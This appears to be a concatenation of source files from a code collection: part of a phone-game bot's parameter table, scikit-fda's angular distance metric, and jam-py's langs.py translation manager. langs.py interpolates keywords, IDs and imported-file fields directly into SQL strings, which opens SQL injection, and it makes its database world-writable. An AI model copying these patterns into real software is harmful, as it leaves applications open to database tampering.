bot_params["PIECE_BASE_HEIGHT_HALF"] = 20
bot_params["PIECE_BODY_WIDTH"] = 70
bot_params["SWIPE_X1"] = 320
bot_params["SWIPE_Y1"] = 410
bot_params["SWIPE_X2"] = 320
bot_params["SWIPE_Y2"] = 410
elif model == "ipx":
bot_params["TIME_COEFF"] = 1.31
bot_params["COORD_Y_START_SCAN"] = 170
bot_params["PIECE_BASE_HEIGHT_HALF"] = 23
bot_params["PIECE_BODY_WIDTH"] = 70
bot_params["SWIPE_X1"] = 320
bot_params["SWIPE_Y1"] = 410
bot_params["SWIPE_X2"] = 320
bot_params["SWIPE_Y2"] = 410
elif model == "se":
bot_params["TIME_COEFF"] = 2.3
bot_params["COORD_Y_START_SCAN"] = 190
bot_params["PIECE_BASE_HEIGHT_HALF"] = 12
bot_params["PIECE_BODY_WIDTH"] = 50
bot_params["SWIPE_X1"] = 375
bot_params["SWIPE_Y1"] = 1055
bot_params["SWIPE_X2"] = 375
bot_params["SWIPE_Y2"] = 1055
else:
print("ParamError: Unknown model type, model should be [ip, plus, ipx, se]")
return bot_params
|
skfda/misc/metrics/_angular.py
|
jiduque/scikit-fda
| 147 |
119088
|
from __future__ import annotations
from typing import Optional, TypeVar, Union
import numpy as np
from typing_extensions import Final
from ...representation import FData
from ...representation._typing import NDArrayFloat
from .._math import cosine_similarity, cosine_similarity_matrix
from ._utils import pairwise_metric_optimization
T = TypeVar("T", bound=Union[NDArrayFloat, FData])
class AngularDistance():
r"""
Calculate the angular distance between two objects.
For each pair of observations x and y the angular distance between them is
defined as the normalized "angle" between them:
.. math::
d(x, y) = \frac{\arccos \left(\frac{\langle x, y \rangle}{
\sqrt{\langle x, x \rangle \langle y, y \rangle}} \right)}{\pi}
where :math:`\langle {}\cdot{}, {}\cdot{} \rangle` is the inner product.
This distance is defined in the interval [0, 1].
Args:
e1: First object.
e2: Second object.
Returns:
Numpy vector where the i-th coordinate has the angular distance between
the i-th element of the first object and the i-th element of the second
one.
Examples:
Computes the angular distances between an object containing functional
data corresponding to the functions y = 1 and y = x defined over the
interval [0, 1] and another ones containing data of the functions y
= 0 and y = x/2. The result then is an array of size 2 with the
computed l2 distance between the functions in the same position in
both.
>>> import skfda
>>> import numpy as np
>>>
>>> x = np.linspace(0, 1, 1001)
>>> fd = skfda.FDataGrid([np.ones(len(x)), x], x)
>>> fd2 = skfda.FDataGrid([2*np.ones(len(x)), np.cos(x)], x)
>>>
>>> skfda.misc.metrics.angular_distance(fd, fd2).round(2)
array([ 0. , 0.22])
"""
def __call__(
self,
e1: T,
e2: T,
) -> NDArrayFloat:
"""Compute the distance."""
return np.arccos(cosine_similarity(e1, e2)) / np.pi
def __repr__(self) -> str:
return (
f"{type(self).__name__}()"
)
angular_distance: Final = AngularDistance()
@pairwise_metric_optimization.register
def _pairwise_metric_optimization_angular(
metric: AngularDistance,
elem1: Union[NDArrayFloat, FData],
elem2: Optional[Union[NDArrayFloat, FData]],
) -> NDArrayFloat:
return np.arccos(cosine_similarity_matrix(elem1, elem2)) / np.pi
|
jam/langs.py
|
pubmania/jam-py
| 384 |
119111
|
import os
import sqlite3
import json
import datetime
from shutil import copyfile
from werkzeug._compat import iteritems, to_bytes, to_unicode
from jam.third_party.filelock import FileLock
import jam
LANG_FIELDS = ['id', 'f_name', 'f_language', 'f_country', 'f_abr', 'f_rtl']
LOCALE_FIELDS = [
'f_decimal_point', 'f_mon_decimal_point',
'f_mon_thousands_sep', 'f_currency_symbol', 'f_frac_digits', 'f_p_cs_precedes',
'f_n_cs_precedes', 'f_p_sep_by_space', 'f_n_sep_by_space', 'f_positive_sign',
'f_negative_sign', 'f_p_sign_posn', 'f_n_sign_posn', 'f_d_fmt', 'f_d_t_fmt'
]
FIELDS = LANG_FIELDS + LOCALE_FIELDS
def lang_con(task):
return sqlite3.connect(os.path.join(task.work_dir, 'langs.sqlite'))
def execute(task, sql, params=None):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
if params:
cursor.execute(sql, params)
else:
cursor.execute(sql)
con.commit()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
def select(task, sql):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute(sql)
result = cursor.fetchall()
con.rollback()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
return result
def copy_table(cursor, name):
cursor.execute('DROP TABLE IF EXISTS SYS_%s' % name)
cursor.execute("SELECT sql FROM LANGS.sqlite_master WHERE type='table' AND name='JAM_%s'" % name)
sql = cursor.fetchone()[0]
cursor.execute(sql.replace('JAM_%s' % name, 'SYS_%s' % name))
cursor.execute('INSERT INTO SYS_%s SELECT * FROM LANGS.JAM_%s' % (name, name))
def update_langs(task):
with task.lock('$langs'):
con = task.create_connection()
try:
cursor = con.cursor()
try:
cursor.execute('ALTER TABLE SYS_PARAMS ADD COLUMN F_JAM_VERSION TEXT')
except:
pass
cursor.execute('SELECT F_JAM_VERSION, F_LANGUAGE FROM SYS_PARAMS')
res = cursor.fetchall()
version = res[0][0]
language = res[0][1]
langs_path = os.path.join(task.work_dir, 'langs.sqlite')
if version != task.app.jam_version or not os.path.exists(langs_path):
# ~ task.log.info('Version changed!')
copyfile(os.path.join(os.path.dirname(jam.__file__), 'langs.sqlite'), langs_path)
os.chmod(os.path.join(task.work_dir, 'langs.sqlite'), 0o666)
cursor.execute('SELECT ID, F_NAME FROM SYS_LANGS')
langs = cursor.fetchall()
langs_list = []
langs_dict = {}
for l in langs:
langs_list.append(l[1])
langs_dict[l[1]] = l[0]
res = select(task, 'SELECT %s FROM JAM_LANGS ORDER BY ID' % ', '.join(FIELDS))
for r in res:
if langs_dict.get(r[1]):
del langs_dict[r[1]]
if not r[1] in langs_list:
fields = ['DELETED']
values = ['?']
field_values = [0]
for i, value in enumerate(r):
if i > 0:
fields.append(FIELDS[i])
values.append('?')
field_values.append(value)
sql = "INSERT INTO SYS_LANGS (%s) VALUES (%s)" % (','.join(fields), ','.join(values))
cursor.execute(sql, (field_values))
del_langs = list(langs_dict.values())
if len(del_langs):
if language in del_langs:
language = 1
sql = "DELETE FROM SYS_LANGS WHERE ID IN (%s)" % ','.join([str(d) for d in del_langs])
cursor.execute(sql)
if language is None:
language = 'NULL'
cursor.execute("UPDATE SYS_PARAMS SET F_JAM_VERSION='%s', F_LANGUAGE=%s" % (task.app.jam_version, language))
con.commit()
finally:
con.close()
def init_locale():
import locale
result = {}
try:
locale.setlocale(locale.LC_ALL, '')
loc = locale.localeconv()
for field in LOCALE_FIELDS:
setting = field[2:]
try:
result[field] = to_unicode(loc[setting], 'utf-8')
except:
result[field] = jam.common.DEFAULT_LOCALE[setting.upper()]
except:
pass
try:
result['f_d_fmt'] = locale.nl_langinfo(locale.D_FMT)
except:
result['f_d_fmt'] = '%Y-%m-%d'
result['f_d_t_fmt'] = '%s %s' % (result['f_d_fmt'], '%H:%M')
return result
def get_lang_dict(task, language):
res = select(task, '''
SELECT K.F_KEYWORD,
CASE WHEN TRIM(V1.F_VALUE) <> ''
THEN V1.F_VALUE
ELSE V2.F_VALUE
END
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (language, 1))
result = {}
for key, value in res:
result[key] = value
return result
def get_locale_dict(task, language):
result = {}
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT %s FROM SYS_LANGS WHERE ID=%s' % (', '.join(LOCALE_FIELDS), language))
res = cursor.fetchall()
if len(res):
for i, field in enumerate(LOCALE_FIELDS):
result[field[2:].upper()] = res[0][i]
else:
raise Exception('Language with id %s is not found' % language)
con.rollback()
except:
result = jam.common.DEFAULT_LOCALE
finally:
con.close()
return result
def get_translation(task, lang1, lang2):
res = select(task, '''
SELECT K.ID, K.F_KEYWORD, V1.F_VALUE, V2.F_VALUE
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (lang1, lang2))
return res
def add_lang(task, lang_id, language, country, name, abr, rtl, copy_lang):
con = lang_con(task)
try:
cursor = con.cursor()
locale = init_locale()
fields = []
values = []
field_values = []
for key, value in iteritems(locale):
fields.append(key)
values.append('?')
field_values.append(to_unicode(value, 'utf-8'))
cursor.execute("INSERT INTO JAM_LANGS (ID, F_LANGUAGE, F_COUNTRY, F_NAME, F_ABR, F_RTL, %s) VALUES (?,?,?,?,?,?,%s)" % (','.join(fields), ','.join(values)),
([lang_id, language, country, name, abr, rtl] + field_values))
if copy_lang:
cursor.execute('''
SELECT JAM_LANG_KEYS.ID, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % copy_lang)
res = cursor.fetchall()
recs = []
for key_id, value in res:
recs.append((key_id, lang_id, value))
cursor.executemany("INSERT INTO JAM_LANG_VALUES(F_KEY, F_LANG, F_VALUE) VALUES (?,?,?)", recs)
con.commit()
langs = task.sys_langs.copy()
langs.set_where(id=lang_id)
langs.open()
if langs.record_count():
langs.edit()
for key, value in iteritems(locale):
langs.field_by_name(key).value = to_unicode(value, 'utf-8')
langs.post()
langs.apply()
finally:
con.close()
def save_lang_field(task, lang_id, field_name, value):
execute(task, 'UPDATE JAM_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('UPDATE SYS_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con.commit()
finally:
con.close()
if task.language == lang_id:
task.update_lang(lang_id)
def save_translation(task, lang_id, key_id, value):
res = select(task, 'SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
if len(res):
execute(task, 'UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
execute(task, 'INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
def add_key(task, key):
result = ''
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("SELECT ID FROM JAM_LANG_KEYS WHERE F_KEYWORD='%s'" % key)
res = cursor.fetchall()
if len(res):
result = 'Keyword exists'
else:
cursor.execute('INSERT INTO JAM_LANG_KEYS (F_KEYWORD) VALUES (?)', (key,))
con.commit()
finally:
con.close()
return result
def del_key(task, key_id):
result = False
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("DELETE FROM JAM_LANG_VALUES WHERE F_KEY=%s" % key_id)
cursor.execute("DELETE FROM JAM_LANG_KEYS WHERE ID=%s" % key_id)
con.commit()
result = True
finally:
con.close()
return result
def get_dict(task, language):
res = select(task, '''
SELECT JAM_LANG_KEYS.F_KEYWORD, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % language)
result = {}
for key, value in res:
result[key] = value
return result
def export_lang(task, lang_id, host):
names = FIELDS[1:]
lang = select(task, 'SELECT %s FROM JAM_LANGS WHERE ID=%s' % (', '.join(names), lang_id))
if len(lang):
language = {}
for i in range(len(lang[0])):
language[names[i]] = lang[0][i]
translation = get_dict(task, lang_id)
content = json.dumps({'language': language, 'translation': translation})
name = language['f_name'].replace(' ', '_')
file_name = '%s_%s.lang' % (name, datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
return {'file_name': file_name, 'content': content}
def import_lang(task, file_path):
error = ''
try:
with open(file_path, 'r') as f:
content = to_unicode(f.read(), 'utf-8')
content = json.loads(content)
language = content['language']
translation = content['translation']
con = lang_con(task)
sys_con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
if len(res):
lang_id = res[0][0]
fields = []
field_values = []
for key, value in iteritems(language):
fields.append('%s=?' % key)
field_values.append(value)
fields = ',' .join(fields)
cursor.execute("UPDATE JAM_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_cursor = sys_con.cursor()
sys_cursor.execute("UPDATE SYS_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_con.commit()
else:
fields = []
values = []
field_values = []
for key, value in iteritems(language):
fields.append(key)
field_values.append(value)
values.append('?')
cursor.execute('INSERT INTO JAM_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
lang_id = res[0][0]
fields.append('DELETED')
values.append('?')
field_values.append(0)
sys_cursor = sys_con.cursor()
sys_cursor.execute('INSERT INTO SYS_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
sys_con.commit()
if lang_id:
cursor.execute('SELECT ID, F_KEYWORD FROM JAM_LANG_KEYS')
res = cursor.fetchall()
keys = {}
for r in res:
keys[r[1]] = r[0]
recs = []
for keyword, value in iteritems(translation):
key_id = keys.get(keyword)
if key_id:
cursor.execute('SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
res = cursor.fetchall()
if len(res):
cursor.execute('UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
cursor.execute('INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
con.commit()
finally:
con.close()
sys_con.close()
except Exception as e:
print(e)
error = 'Can not import language'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.